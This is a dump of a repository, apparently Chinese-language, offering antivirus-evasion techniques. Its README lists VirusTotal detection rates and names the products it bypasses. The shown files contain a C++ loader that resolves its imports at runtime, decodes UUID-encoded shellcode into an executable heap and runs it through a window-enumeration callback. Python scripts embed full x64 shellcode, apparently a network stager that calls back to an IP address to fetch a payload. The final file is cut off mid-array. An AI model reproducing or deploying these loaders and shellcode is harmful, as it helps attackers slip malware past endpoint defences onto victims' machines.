├── callback ├── v0.1 │ ├── main.cpp │ └── trans.py ├── v0.2 │ ├── main.cpp │ ├── Base64.h │ └── trans.py ├── v0.3 │ ├── main.cpp │ └── trans.py ├── v0.4 │ ├── main.cpp │ └── trans.py ├── v0.5 │ ├── trans.py │ └── main.cpp └── README.md ├── images ├── image-common-1.png ├── image-common-2.png ├── image-callback-1.png ├── image-callback-2.png ├── image-callback-3.png ├── image-callback-4.png ├── image-callback-5.png ├── image-import-tables-1.png ├── image-import-tables-2.png └── image-import-tables-3.png ├── hide_Import_tables ├── v0.2 │ ├── main.cpp │ ├── Base64.h │ └── trans.py ├── v0.4 │ ├── main.cpp │ └── trans.py ├── v0.1 │ ├── main.cpp │ └── trans.py ├── v0.5 │ ├── trans.py │ └── main.cpp ├── v0.3 │ ├── trans.py │ └── main.cpp └── README.md ├── common └── VS中运行去除黑框.md └── README.md /callback/v0.1/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/callback/v0.1/main.cpp -------------------------------------------------------------------------------- /callback/v0.2/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/callback/v0.2/main.cpp -------------------------------------------------------------------------------- /callback/v0.3/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/callback/v0.3/main.cpp -------------------------------------------------------------------------------- /callback/v0.4/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/callback/v0.4/main.cpp -------------------------------------------------------------------------------- /images/image-common-1.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-common-1.png -------------------------------------------------------------------------------- /images/image-common-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-common-2.png -------------------------------------------------------------------------------- /images/image-callback-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-callback-1.png -------------------------------------------------------------------------------- /images/image-callback-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-callback-2.png -------------------------------------------------------------------------------- /images/image-callback-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-callback-3.png -------------------------------------------------------------------------------- /images/image-callback-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-callback-4.png -------------------------------------------------------------------------------- /images/image-callback-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-callback-5.png -------------------------------------------------------------------------------- /hide_Import_tables/v0.2/main.cpp: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/hide_Import_tables/v0.2/main.cpp -------------------------------------------------------------------------------- /hide_Import_tables/v0.4/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/hide_Import_tables/v0.4/main.cpp -------------------------------------------------------------------------------- /images/image-import-tables-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-import-tables-1.png -------------------------------------------------------------------------------- /images/image-import-tables-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-import-tables-2.png -------------------------------------------------------------------------------- /images/image-import-tables-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/midisec/BypassAnti-Virus/HEAD/images/image-import-tables-3.png -------------------------------------------------------------------------------- /common/VS中运行去除黑框.md: -------------------------------------------------------------------------------- 1 | # VS运行去除黑框 2 | 3 | 项目->链接器->系统->子系统改成窗口(/SUBSYSTEM:WINDOWS),默认的是控制台(/SUBSYSTEM:CONSOLE)。 4 | 5 | ![image-20220217183252141](../images/image-common-1.png) 6 | 7 | 8 | 9 | 项目->链接器->高级->入口点改成mainCRTStartup(窗口子系统默认以WinMain为入口,指定mainCRTStartup后仍可使用原来的main函数) 10 | 11 | ![image-20220217183205834](../images/image-common-2.png) -------------------------------------------------------------------------------- /callback/v0.2/Base64.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | // Base64.h 3 | #ifndef 
__BASE64_H__ 4 | #define __BASE64_H__ 5 | 6 | #include 7 | using std::string; 8 | 9 | class CBase64 10 | { 11 | public: 12 | static bool Encode(const string& strIn, string& strOut); 13 | static bool Decode(const string& strIn, string& strOut, bool fCheckInputValid = false); 14 | }; 15 | 16 | #endif -------------------------------------------------------------------------------- /hide_Import_tables/v0.2/Base64.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | // Base64.h 3 | #ifndef __BASE64_H__ 4 | #define __BASE64_H__ 5 | 6 | #include 7 | using std::string; 8 | 9 | class CBase64 10 | { 11 | public: 12 | static bool Encode(const string& strIn, string& strOut); 13 | static bool Decode(const string& strIn, string& strOut, bool fCheckInputValid = false); 14 | }; 15 | 16 | #endif -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bypass Anti-Virus 2 | 3 | **我也是一个小白,很喜欢免杀技术,自己琢磨、研究、复现了几种绕过杀软的姿势,分享给大家。** 4 | 5 | **郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!** 6 | 7 | 8 | 9 | ## 上手指南 10 | 11 | 通过下表选择你感兴趣的免杀方式 12 | 13 | | 序号 | 免杀方式 | VT查杀率(avg) | 时间 | 火绒 | 360 | 腾讯 | 代码实现 | 14 | | ---- | ------------------------------------------------------------ | ------------- | ---------- | ---- | ---- | ---- | -------- | 15 | | 1 | [回调函数(及改进)](https://github.com/midisec/BypassAnti-Virus/tree/main/callback) | 2/68 | 2022-02-18 | √ | √ | √ | c++ | 16 | | 2 | [隐藏导入表](https://github.com/midisec/BypassAnti-Virus/tree/main/hide_Import_tables) | 8/68 | 2022-07-10 | √ | √ | √ | c++ | 17 | | 3 | | | | | | | | 18 | 19 | 20 | 21 | 22 | 23 | ## 更新消息 24 | 25 | 2022-02-18 26 | 27 | * 通过[回调函数](https://github.com/midisec/BypassAnti-Virus/tree/main/callback)加载恶意shellcode(c++) 28 | * 新增UUID方式,通过回调函数加载shellcode(c++) 29 | * 新增BASE64编码+UUID方式,通过回调函数加载shellcode(c++) 30 | 31 | 2022-02-21 32 | 33 | * 
新增[IPV6方式](https://github.com/midisec/BypassAnti-Virus/tree/main/callback/v0.3),通过回调函数加载shellcode(c++) 34 | * 新增[MAC方式](https://github.com/midisec/BypassAnti-Virus/tree/main/callback/v0.4),通过回调函数加载shellcode(c++) 35 | 36 | 2022-03-07 37 | * 新增[IPV4方式](https://github.com/midisec/BypassAnti-Virus/tree/main/callback/v0.5),通过回调函数加载shellcode(c++) 38 | 39 | 2022-03-08 40 | 41 | * 新增13种[可利用的回调函数](https://github.com/midisec/BypassAnti-Virus/tree/main/callback#%E5%8F%AF%E5%88%A9%E7%94%A8%E7%9A%84%E5%9B%9E%E8%B0%83%E5%87%BD%E6%95%B0)加载shellcode(c++) 42 | 43 | 2022-07-10 44 | 45 | * 通过[隐藏导入表的方式](https://github.com/midisec/BypassAnti-Virus/tree/main/hide_Import_tables)绕过部分敏感函数调用静态查杀(c++) 46 | 47 | 48 | 49 | ## 贡献者 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /hide_Import_tables/v0.1/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #pragma comment(lib, "Rpcrt4.lib") 5 | 6 | 7 | const char* uuids[] = 8 | { 9 | "e48348fc-e8f0-00c8-0000-415141505251", "d2314856-4865-528b-6048-8b5218488b52", "728b4820-4850-b70f-4a4a-4d31c94831c0", "7c613cac-2c02-4120-c1c9-0d4101c1e2ed", "48514152-528b-8b20-423c-4801d0668178", "75020b18-8b72-8880-0000-004885c07467", "50d00148-488b-4418-8b40-204901d0e356", "41c9ff48-348b-4888-01d6-4d31c94831c0", "c9c141ac-410d-c101-38e0-75f14c034c24", "d1394508-d875-4458-8b40-244901d06641", "44480c8b-408b-491c-01d0-418b04884801", "415841d0-5e58-5a59-4158-4159415a4883", "524120ec-e0ff-4158-595a-488b12e94fff", "6a5dffff-4900-77be-696e-696e65740041", "e6894956-894c-41f1-ba4c-772607ffd548", "3148c931-4dd2-c031-4d31-c94150415041", "79563aba-ffa7-e9d5-9300-00005a4889c1", "01bbb841-0000-314d-c941-5141516a0341", "57ba4151-9f89-ffc6-d5eb-795b4889c148", "8949d231-4dd8-c931-5268-0032c0845252", "55ebba41-3b2e-d5ff-4889-c64883c3506a", "89485f0a-baf1-001f-0000-6a0068803300", "e0894900-b941-0004-0000-41ba75469e86", 
"8948d5ff-48f1-da89-49c7-c0ffffffff4d", "5252c931-ba41-062d-187b-ffd585c00f85", "0000019d-ff48-0fcf-848c-010000ebb3e9", "000001e4-82e8-ffff-ff2f-4c70584900df", "c70b55e6-190b-b44d-748f-06898a62178f", "21c88ac2-1ba0-3f2e-f9cf-4b3272e2e974", "f5326c2d-0ed2-b1ca-8a0a-c6f2f8ece05c", "62865e80-8d24-100a-51d6-daaf84ce8a8a", "1878faa7-bc97-50b0-0055-7365722d4167", "3a746e65-4d20-7a6f-696c-6c612f352e30", "6f632820-706d-7461-6962-6c653b204d53", "31204549-2e30-3b30-2057-696e646f7773", "20544e20-2e36-3b32-2057-4f5736343b20", "64697254-6e65-2f74-362e-303b204d4147", "29534a57-0a0d-ce00-758d-fb7ddbd6051b", "fa45c5cb-217e-e55f-c30b-88f322f42bf7", "6e5cfa55-debd-9931-bbef-1a1eeeb93ab1", "46b1bc56-8056-f1b3-7b88-93a2767a5995", "2d06674a-36cb-51b2-8583-b8fc5957e85b", "1fa25721-5fc0-1003-e185-04b060e6e7a7", "40325298-4744-61db-b711-425af22006b7", "ed269ac6-9a5e-87fd-9e73-66a9e9f595c7", "2d4d6374-13ab-f500-e680-00f469c855de", "2c779de6-1cb7-22af-e9a7-fc1c37e7e9d6", "30fe8ed1-21ae-dd9f-e9dc-62bcfdf26893", "e14c61ee-0e39-c60c-37a3-e3a427b172ec", "9cfbf3b0-7979-60f5-7773-cdc573610109", "7075c3b5-b1a9-a24e-0041-bef0b5a256ff", "c93148d5-00ba-4000-0041-b80010000041", "000040b9-4100-58ba-a453-e5ffd5489353", "e7894853-8948-48f1-89da-41b800200000", "41f98949-12ba-8996-e2ff-d54883c42085", "66b674c0-078b-0148-c385-c075d7585858", "00000548-0000-c350-e87f-fdffff312e31", "30382e35-312e-3230-0049-9602d2000000" 10 | }; 11 | 12 | 13 | typedef HANDLE(WINAPI* ImportHeapCreate)( 14 | _In_ DWORD flOptions, 15 | _In_ SIZE_T dwInitialSize, 16 | _In_ SIZE_T dwMaximumSize 17 | ); 18 | 19 | typedef LPVOID(WINAPI* ImportHeapAlloc)( 20 | _In_ HANDLE hHeap, 21 | _In_ DWORD dwFlags, 22 | _In_ SIZE_T dwBytes 23 | ); 24 | 25 | typedef RPC_STATUS(RPC_ENTRY* ImportUuidFromStringA)( 26 | _In_opt_ RPC_CSTR StringUuid, 27 | _Out_ UUID __RPC_FAR* Uuid 28 | ); 29 | 30 | 31 | int main() 32 | { 33 | ImportHeapCreate MyHeapCreate = (ImportHeapCreate)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapCreate"); 34 | 
ImportHeapAlloc MyHeapAlloc = (ImportHeapAlloc)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapAlloc"); 35 | 36 | HMODULE hModule = LoadLibraryA("RPCRT4.dll"); 37 | ImportUuidFromStringA MyUuidFromStringA = (ImportUuidFromStringA)GetProcAddress(hModule, "UuidFromStringA"); 38 | 39 | HANDLE hc = MyHeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); 40 | void* ha = MyHeapAlloc(hc, 0, 0x100000); 41 | 42 | DWORD_PTR hptr = (DWORD_PTR)ha; 43 | int elems = sizeof(uuids) / sizeof(uuids[0]); 44 | 45 | for (int i = 0; i < elems; i++) { 46 | RPC_STATUS status = MyUuidFromStringA((RPC_CSTR)uuids[i], (UUID*)hptr); 47 | if (status != RPC_S_OK) { 48 | CloseHandle(ha); 49 | return -1; 50 | } 51 | hptr += 16; 52 | } 53 | 54 | EnumChildWindows(NULL, (WNDENUMPROC)ha, 0); 55 | CloseHandle(ha); 56 | return 0; 57 | } -------------------------------------------------------------------------------- /callback/v0.5/trans.py: -------------------------------------------------------------------------------- 1 | import ipaddress 2 | 3 | 4 | buf = 
b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x6c\x7a\x36\x41\x00\xf7\x60\x59\x6d\x9c\x78\x07\x14\x7f\x90\x3c\xb5\xf2\xd1\x99\x9d\x91\xc2\x66\xc4\x6e\x17\x3f\xb8\x43\xb3\xee\x45\x28\xef\x8f\xce\x7b\x5b\x06\x91\x2c\x2e\xa4\x2a\xe7\x68\xde\xb9\xf2\x82\xde\xae\x9e\x91\xe7\xf5\x30\x38\x9f\x6b\xe4\x40\x5a\x07\xbc\xcf\x15\x91\x99\xe0\x5f\x94
\x3e\x00\xa5\x0f\xfd\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x41\x52\x4a\x53\x29\x0d\x0a\x00\x71\xe4\xfb\xc4\x3a\xc6\x6a\x35\x0e\x94\xd6\xd4\x36\x78\xf7\x49\x9d\x55\x26\x95\xac\x46\xfb\x05\x6a\xf6\x58\x5c\x9f\x31\x8b\xee\x43\x2e\xf9\xf0\x8c\x6a\x48\x6a\xf0\xe8\x89\x88\x15\x32\x17\x6b\xe5\x58\x01\xb7\x6c\xb0\x96\xc4\x7f\x49\x51\x34\x28\x5e\xb9\x98\x7c\x4d\xba\x1c\xe2\x35\x45\x25\x71\xda\x4b\x1f\x7f\x67\xb7\x7d\x9e\xb0\xa8\x7f\x0b\xed\x8a\x5c\x12\xa9\x62\x5a\x09\x81\xb7\xb9\x10\xb3\x8b\xdd\x98\xe9\x6f\x62\x1e\xa9\x89\x2f\xfa\x9f\x26\x66\x16\xb1\x3b\xd0\xb0\xc3\x32\xb1\xe0\x0d\xf9\xa3\x41\x00\x23\xd0\x71\x71\xc0\x1a\x73\xf1\x40\x04\x3b\xae\x57\x16\x7c\x42\x0c\x48\x31\x97\x60\x7a\xac\x60\xc5\xc7\x85\x62\xba\xbc\xef\xfe\x62\xa4\x7d\x0e\x79\x75\x4b\x47\xb8\x6d\x42\x48\xdf\x4a\x33\x64\xd0\x86\x3b\x29\xb1\x9b\xde\xdc\x9a\xb6\xcc\x1c\x36\xde\x51\x0c\x4f\xa4\x83\x85\x85\xaf\x7d\x23\x1c\x56\xdb\x86\xbe\x91\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' # shellcode 5 | 6 | 7 | def convertToIPV4(shellcode): 8 | if len(shellcode)%4 !=0: 9 | print("\n[*] length:",len(shellcode)+(4-(len(shellcode)%4))) 10 | addNullbyte = b"\x00" * (4-(len(shellcode)%4)) 11 | shellcode += addNullbyte 12 | 13 | ipv4 = [] 14 | for i in range(0, len(shellcode), 
4): 15 | ipv4.append(str(ipaddress.IPv4Address(shellcode[i:i+4]))) 16 | return ipv4 17 | 18 | 19 | if __name__ == '__main__': 20 | r = convertToIPV4(buf) 21 | print(str(r).replace("'","\"")) 22 | -------------------------------------------------------------------------------- /hide_Import_tables/v0.5/trans.py: -------------------------------------------------------------------------------- 1 | import ipaddress 2 | 3 | 4 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d
\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x4c\x70\x58\x49\x00\xdf\xe6\x55\x0b\xc7\x0b\x19\x4d\xb4\x74\x8f\x06\x89\x8a\x62\x17\x8f\xc2\x8a\xc8\x21\xa0\x1b\x2e\x3f\xf9\xcf\x4b\x32\x72\xe2\xe9\x74\x2d\x6c\x32\xf5\xd2\x0e\xca\xb1\x8a\x0a\xc6\xf2\xf8\xec\xe0\x5c\x80\x5e\x86\x62\x24\x8d\x0a\x10\x51\xd6\xda\xaf\x84\xce\x8a\x8a\xa7\xfa\x78\x18\x97\xbc\xb0\x50\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x47\x57\x4a\x53\x29\x0d\x0a\x00\xce\x75\x8d\xfb\x7d\xdb\xd6\x05\x1b\xcb\xc5\x45\xfa\x7e\x21\x5f\xe5\xc3\x0b\x88\xf3\x22\xf4\x2b\xf7\x55\xfa\x5c\x6e\xbd\xde\x31\x99\xbb\xef\x1a\x1e\xee\xb9\x3a\xb1\x56\xbc\xb1\x46\x56\x80\xb3\xf1\x7b\x88\x93\xa2\x76\x7a\x59\x95\x4a\x67\x06\x2d\xcb\x36\xb2\x51\x85\x83\xb8\xfc\x59\x57\xe8\x5b\x21\x57\xa2\x1f\xc0\x5f\x03\x10\xe1\x85\x04\xb0\x60\xe6\xe7\xa7\x98\x52\x32\x40\x44\x47\xdb\x61\xb7\x11\x42\x5a\xf2\x20\x06\xb7\xc6\x9a\x26\xed\x5e\x9a\xfd\x87\x9e\x73\x66\xa9\xe9\xf5\x95\xc7\x74\x63\x4d\x2d\xab\x13\x00\xf5\xe6\x80\x00\xf4\x69\xc8\x55\xde\xe6\x9d\x77\x2c\xb7\x1c\xaf\x22\xe9\xa7\xfc\x1c\x37\xe7\xe9\xd6\xd1\x8e\xfe\x30\xae\x21\x9f\xdd\xe9\xdc\x62\xbc\xfd\xf2\x68\x93\xee\x61\x4c\xe1\x39\x0e\x0c\xc6\x37\xa3\xe3\xa4\x27\xb1\x72\xec\xb0\xf3\xfb\x9c\x79\x79\xf5\x60\x77\x73\xcd\xc5\x73\x61\x01\x09\xb5\xc3\x75\x70\xa9\xb1\x4e\xa2\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0
\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' # shellcode 5 | 6 | 7 | def convertToIPV4(shellcode): 8 | if len(shellcode)%4 !=0: 9 | print("\n[*] length:",len(shellcode)+(4-(len(shellcode)%4))) 10 | addNullbyte = b"\x00" * (4-(len(shellcode)%4)) 11 | shellcode += addNullbyte 12 | 13 | ipv4 = [] 14 | for i in range(0, len(shellcode), 4): 15 | ipv4.append(str(ipaddress.IPv4Address(shellcode[i:i+4]))) 16 | return ipv4 17 | 18 | 19 | if __name__ == '__main__': 20 | r = convertToIPV4(buf) 21 | print(str(r).replace("'","\"")) 22 | -------------------------------------------------------------------------------- /callback/v0.1/trans.py: -------------------------------------------------------------------------------- 1 | import uuid 2 | 3 | def convertToUUID(shellcode): 4 | if len(shellcode)%16 !=0: 5 | print("\n[*] length:",len(shellcode)+(16-(len(shellcode)%16))) 6 | addNullbyte = b"\x00" * (16-(len(shellcode)%16)) 7 | shellcode += addNullbyte 8 | 9 | uuids = [] 10 | for i in range(0,len(shellcode),16): 11 | uuidString = str(uuid.UUID(bytes_le=shellcode[i:i+16])) 12 | uuids.append(uuidString.replace("'","\"")) 13 | return uuids 14 | 15 | if __name__ == '__main__': 16 | buf = 
b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xf